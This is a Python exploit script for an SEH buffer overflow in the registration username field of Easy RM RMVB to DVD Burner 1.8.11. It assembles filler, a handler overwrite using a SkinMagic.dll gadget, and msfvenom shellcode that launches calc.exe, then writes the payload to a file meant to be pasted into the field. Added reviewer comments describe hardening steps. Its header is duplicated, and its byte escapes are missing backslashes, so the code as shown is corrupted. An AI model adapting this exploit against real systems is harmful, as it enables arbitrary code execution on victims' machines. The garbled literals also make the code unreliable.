
#!/usr/bin/python

#================================== #!/usr/bin/python

#========================================================================================================================
# Exploit Author : Touhid M.Shaikh
# Exploit Title : Easy RM RMVB to DVD Burner 1.8.11 - 'Enter User Name' Field Buffer Overflow (SEH)
# Date : 28-08-2017
# Website : www.touhidshaikh.com
# Contact : https://github.com/touhidshaikh
# Vulnerable Software: Easy RM RMVB to DVD Burner
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.8.11
# Software Link: http://www.divxtodvd.net/easy_rm_to_dvd.exe
# Tested On: Windows 7 x86
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of calc.txt
#
#========================================================================================================================


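# Proof-of-concept input generator for the SEH-based buffer overflow described
# in the header: it concatenates filler, an exception-handler record, padding
# and a payload, then writes the result to calc.txt so it can be pasted into
# the "Enter User Name" field of the registration dialog.
#
# Reviewer notes (defensive context):
# - The handler address below comes from SkinMagic.dll, which the author's
#   module listing reports as built without ASLR, rebasing or SafeSEH. A module
#   with those properties loads at a predictable address, which is what lets a
#   fixed pointer be embedded in the input. Rebuilding or replacing such
#   modules with those mitigations enabled, and enabling SEHOP on the host
#   where available, are the relevant hardening steps.
# - The payload is the msfvenom `windows/exec CMD=calc.exe` stub named in the
#   comment below; a calculator process spawned as a child of the burner
#   application is the observable effect to look for when validating a fix
#   or a detection rule.
# - NOTE(review): every string literal is kept exactly as it appears on this
#   page; as shown they are plain ASCII text such as "x41", not byte escapes.

# Filler that precedes the exception-handler record (literal repeated 1008x).
buffer = "x41" * 1008

# Value written over the "next SEH" field of the handler record.
nSEH = "xebx10x90x90"

# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ}
# [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
# (The second line above was a bare continuation line in the original and
# made the script a syntax error; it is restored as a comment.)
SEH = "x59x78x03x10"

# Characters the author excluded when generating the payload. This name is not
# referenced anywhere below; it only documents the constraint.
badchars = "x00x0ax0d" # and 0x80 to 0xff

# msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f python
buf = ""
buf += "xdaxd7xd9x74x24xf4xbax07xc8xf9x11x5ex2b"
buf += "xc9xb1x31x31x56x18x03x56x18x83xeexfbx2a"
buf += "x0cxedxebx29xefx0exebx4dx79xebxdax4dx1d"
buf += "x7fx4cx7ex55x2dx60xf5x3bxc6xf3x7bx94xe9"
buf += "xb4x36xc2xc4x45x6ax36x46xc5x71x6bxa8xf4"
buf += "xb9x7exa9x31xa7x73xfbxeaxa3x26xecx9fxfe"
buf += "xfax87xd3xefx7ax7bxa3x0exaax2axb8x48x6c"
buf += "xccx6dxe1x25xd6x72xccxfcx6dx40xbaxfexa7"
buf += "x99x43xacx89x16xb6xacxcex90x29xdbx26xe3"
buf += "xd4xdcxfcx9ex02x68xe7x38xc0xcaxc3xb9x05"
buf += "x8cx80xb5xe2xdaxcfxd9xf5x0fx64xe5x7exae"
buf += "xabx6cxc4x95x6fx35x9exb4x36x93x71xc8x29"
buf += "x7cx2dx6cx21x90x3ax1dx68xfexbdx93x16x4c"
buf += "xbdxabx18xe0xd6x9ax93x6fxa0x22x76xd4x5e"
buf += "x69xdbx7cxf7x34x89x3dx9axc6x67x01xa3x44"
buf += "x82xf9x50x54xe7xfcx1dxd2x1bx8cx0exb7x1b"
buf += "x23x2ex92x7fxa2xbcx7exaex41x45xe4xae"

# Padding placed between the handler record and the payload.
nops = "x90" * 16

# Final layout: filler | next-SEH field | handler pointer | padding | payload.
data = buffer + nSEH + SEH + nops + buf

# Use a context manager so the handle is closed even if the write fails.
with open("calc.txt", "w") as f:
    f.write(data)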

#Greetz => Jack Carlo